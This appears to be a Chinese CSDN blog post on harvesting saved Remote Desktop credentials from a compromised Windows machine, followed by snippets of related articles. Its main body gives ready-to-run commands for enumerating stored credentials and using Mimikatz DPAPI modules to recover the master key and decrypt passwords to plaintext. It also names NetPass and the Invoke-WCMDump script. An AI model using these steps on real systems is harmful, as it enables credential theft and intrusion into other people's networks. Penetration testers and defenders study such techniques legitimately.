RDP登录凭据获取

最新推荐文章于 2024-05-15 18:18:40 发布
最新推荐文章于 2024-05-15 18:18:40 发布
阅读量916 收藏 4
点赞数
分类专栏: 安全 文章标签: python shell mac 数据库 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tomyyyyyy/article/details/119963178
版权
本文介绍了如何获取并解密保存在RDP(远程桌面协议)中的登录凭据,包括通过cmdkey命令查看连接记录,利用Mimikatz工具提取MasterKey和解密凭据,以及使用NetPass和PowerShell脚本进行抓取。这些方法揭示了系统安全中潜在的风险,提醒用户注意保护敏感信息。
摘要由CSDN通过智能技术生成

RDP登录凭据获取

当用户在RDP登录时点击了保存登录凭据,获取凭据可以使用以下几种方法

#查看mstsc的连接记录
cmdkey /list
#查找本地的Credentials
dir /a %userprofile%\appdata\local\microsoft\credentials\*

img

Mimikatz

存在的话,使用Mimikatz,执行以下命令,记录guidMasterKey值

mimikatz.exe "privilege::debug" "dpapi::cred /in:C:\Users\administrator.TEST\appdata\local\microsoft\credentials\AFCD2DF5CFF3011965E57ABB0ED64240"

img

接着,再执行如下命令,找到guidMasterKey对应的MasterKey

mimikatz.exe "privilege::debug" "sekurlsa::dpapi"

img

执行以下命令,使用上面记录的MasterKey解密指定的凭据: AFCD2DF5CFF3011965E57ABB0ED64240

mimikatz.exe "dpapi::cred /in:C:\Users\administrator.TEST\appdata\local\microsoft\credentials\AFCD2DF5CFF3011965E57ABB0ED64240 /masterkey:3886e1d7a926c6267058d67385cb4e985b3aa0d3f635eebb5fe83ce8d0457d4493e8694f60d9f19a96631c89411ed5477254be5cd5d90c5ed5d36bd4c3271615"

img

如上图,已解密出明文。

NetPass抓取

工具下载地址:https://www.nirsoft.net/utils/network_password_recovery.html

img

PowerShelll脚本抓取

Import-Module .\Invoke-WCMDump.ps1
Invoke-WCMDump

参考链接

tomyyyyy
关注
专栏目录
获取RDP登录凭据
谢公子的博客
07-01 3664
当我们拿到了机器的管理员权限后,想获取RDP凭据保存的密码。那么,该如何操作呢? #查看mstsc的连接纪录 cmdkey /list #查找本地的Credentials: dir /a %userprofile%\AppData\Local\Microsoft\Credentials\* 上传mimikatz,执行以下命令: ...
RDP之远程登录
战神/calmness的博客
06-23 2110
简述 最近搞内网渗透测试,发现得经常的去连接远程桌面,故此写一下整理一下笔记,巩固一下知识 rdp服务是我们常用的服务,可以不是3389端口,可以改成任意端口,时候为了利用它,必须先找出来服务端口,毕竟管理员也鸡贼。 查看RDP服务端口 查看rdp服务端口 REG QUERY “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp” /V PortNumber 得到连接端口为 0xd3d
RDP 总结(二):登录凭据获取
prettyX的博客
08-21 1051
当用户在RDP登录时点击了保存登录凭据获取凭据可以使用以下几种方法 查看是否存在RDP凭据 #查看mstsc的连接记录 cmdkey /list #查找本地的Credentials dir /a %userprofile%\appdata\local\microsoft\credentials\* Mimikatz 存在的话,使用Mimikatz,执行以下命令,记录guidMasterKey值 mimikatz.exe "privilege::debug" "dpapi::cred..
内网渗透测试:获取远程桌面连接记录与 RDP 凭据
qq_53058639的博客
08-20 853
Windows 远程桌面是用于管理 Windows服务器的最广泛使用的工具之一。管理员喜欢使用远程桌面,攻击者也喜欢使用(狗头)。在之前的文章中我们已经介绍了很多攻击远程桌面的方法,本篇文章我们继续来探究。在渗透测试中,RDP远程桌面连接的历史记录不可忽视,根据历史连接记录我们往往能够定位出关键的服务器。并且,当我们发现了某台主机上存在远程桌面的连接记录,我们还可以想办法获取其远程桌面登录历史的连接凭据。用于登录RDP 远程桌面会话的凭据通常具有特权,这使它们成为红队操作期间的完美目标。
RDP密码凭据抓取
Y22Lee的博客
05-15 837
命令:dpapi::cred /in:凭据文件路径 /masterkey:masterkey值。
获取rdp保存的凭证
weixin_44747030的博客
12-23 1513
获取rdp保存的凭证
Windows远程桌面(RDP)密码凭证获取 (゚益゚メ) 渗透测试
寻觅的博客
03-07 5710
文章目录RDP连接记录MySQL数据库密码破解WiFi密码获取浏览器相关记录其他可造成安全隐患软件NacicatXmangagerTeamview RDP连接记录 MySQL数据库密码破解 WiFi密码获取 浏览器相关记录 其他可造成安全隐患软件 Nacicat Xmangager Teamview ...
获取主机RDP连接凭据
内心不种满鲜花就会长满杂草
02-09 1319
为了避免每次连接服务器都进行身份验证,经常使用RDP的用户可能勾选保存连接凭据,以便进行快速的身份验证。使用找到的Masterkey的值破解指定的凭据文件6A538A1931101CE75C0D949EF75C9CDC,如下成功破解,得到rdp明文。得到的pbData就是凭据的加密数据,guidMasterKey是该凭据的GUID,记录guidMasterKey的值。如下,Credentials目录下保存了一个历史连接凭据,但其中的凭据是加密的。获取rdp加密凭据中的guidMasterKey值。
RDP文件密码加解密
12-13
在使用RDP文件进行远程连接时,通常会包含登录凭据,如用户名和密码,以便轻松地建立连接。对于"RDP文件密码加解密"这个主题,我们将深入探讨RDP文件的结构、密码存储方式以及如何处理这些密码。 RDP文件本质上是...
Multiple RDP launcher-开源
05-03
- 自动登录:节省时间,自动填写登录凭据。 - 脚本支持:可能允许通过脚本自动化某些RDP任务。 总的来说,RDPr是一款强大的开源工具,它简化了同时管理多个RDP连接的过程,是IT专业人士高效工作的好帮手。通过其...
【湃哒星说安全】内网渗透技巧之RdpThief实践
PaidaxingSec的博客
11-22 717
在实际渗透过程中,各种口令凭据的窃取是一种美妙的艺术。而我们发现,登录 RDP 会话的凭据权限都比较高,除却通过 lsass.exe 来窃取口令外,RdpThief 应用而生。本文主要结合工具 CobaltStrike 以及 RdpThief 进行测试实验,以及些许原理的说明。
RDP远程桌面密码凭证获取
LuckySec
10-19 5661
在渗透过程中获取到一台Windows服务器后,可以尝试获取当前机器保存的RDP远程桌面密码凭证,进而在内网横向渗透中进一步扩大战果。
Windows RDP远程桌面 提示出现身份验证错误 要求的函数不受支持 解决方法
qq_34185638的博客
01-27 2331
Windows RDP远程桌面 提示出现身份验证错误 要求的函数不受支持 解决方法
PC机器开启多用户RDP登录
谢公子的博客
09-19 1944
Windows PC机器开启多用户RDP
解决远程桌面6.0登陆时要求的凭据问题
kunchio的专栏
03-09 1930
要变通解决此问题,请关闭远程桌面连接 6.0 中的新功能,以还原为远程桌面连接 5.x 中的功能。为此,请按照下列步骤操作: 单击“开始”,单击“运行”,键入 mstsc.exe,然后单击“确定”。 单击“选项”,然后单击“常规”选项卡。 单击“另存为”,然后在“文件名”框中键入文件名。 选择要将远程桌面文件保存到的位置,单击“保存”,然后单击“取消”。注意:所保存的文件具有
[内网]RDP远程桌面密码凭证获取
qq_64787896的博客
03-24 605
根据上面实验找到的路径,将计算机保存的凭据拷贝到Win2012,使用dpapi读取文件。根据guid找到masterkey (可能需要privilege::debug提权)导出lsass.dmp文件,上传到Win2012。实验二:读取lsass1.dmp文件。2012R2以上版本都会以密文存放。实验一:找到凭据位置读取。查看当前计算机保存的凭据。其余操作同上一个实验。
远程登录Windows sever
最新发布
06-16
远程登录Windows Server,通常指的是使用远程桌面协议(Remote Desktop Protocol, RDP)来访问和管理远程服务器。这是一种标准协议,允许用户从另一台设备通过网络连接到Windows服务器,就像直接坐在那台服务器前一样操作。 下面是远程登录Windows Server的基本步骤: 1. **安装并配置RDP服务**:确保Windows Server上已经安装了远程桌面服务,并配置了允许远程访问的设置。在服务器管理器中,你可以找到“系统” > “远程设置”来进行这些配置。 2. **获取凭据**:你需要知道目标服务器的用户名和密码,以及可能的安全组权限或IP地址过滤规则。 3. **启动远程桌面客户端**:在支持RDP的设备上,如Windows或macOS的内置客户端,或者使用第三方软件如Microsoft Remote Desktop应用。 4. **连接到服务器**:输入服务器的IP地址或计算机名,然后输入凭据进行连接。 5. **安全注意事项**:确保网络连接安全,尤其是在公共网络上,最好启用SSL/TLS加密,并且只在必要时开启远程访问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值